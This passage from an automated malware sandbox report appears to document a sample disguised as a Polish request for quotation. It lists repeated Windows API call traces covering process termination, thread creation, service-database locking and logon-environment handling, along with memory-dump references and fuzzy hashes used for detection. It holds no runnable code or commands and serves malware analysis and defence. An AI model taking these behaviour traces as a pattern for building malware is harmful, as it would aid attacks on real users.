                                                                                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                                                                                                      • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                                                                                                      • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 004141A8
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1803633139-0
                                                                                                                                                                                                                                                      • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                      • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3275902921-0
                                                                                                                                                                                                                                                      • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                      • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 004554DF
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3691411573-0
                                                                                                                                                                                                                                                      • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                      • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1814673581-0
                                                                                                                                                                                                                                                      • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                      • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                                      • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                      • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 372113273-0
                                                                                                                                                                                                                                                      • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                      • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                        • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                                      • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                      • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                                      • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                      • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,004A7D14,00000004), ref: 00436055
                                                                                                                                                                                                                                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                                                                                                                                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00436081
                                                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1690418490-0
                                                                                                                                                                                                                                                      • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                      • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                                                                                                      • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 763830540-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 20f888e87418bdffc65c99fd9354da899e7a4d3b5911f688c71664234f3ce0af
                                                                                                                                                                                                                                                      • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20f888e87418bdffc65c99fd9354da899e7a4d3b5911f688c71664234f3ce0af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
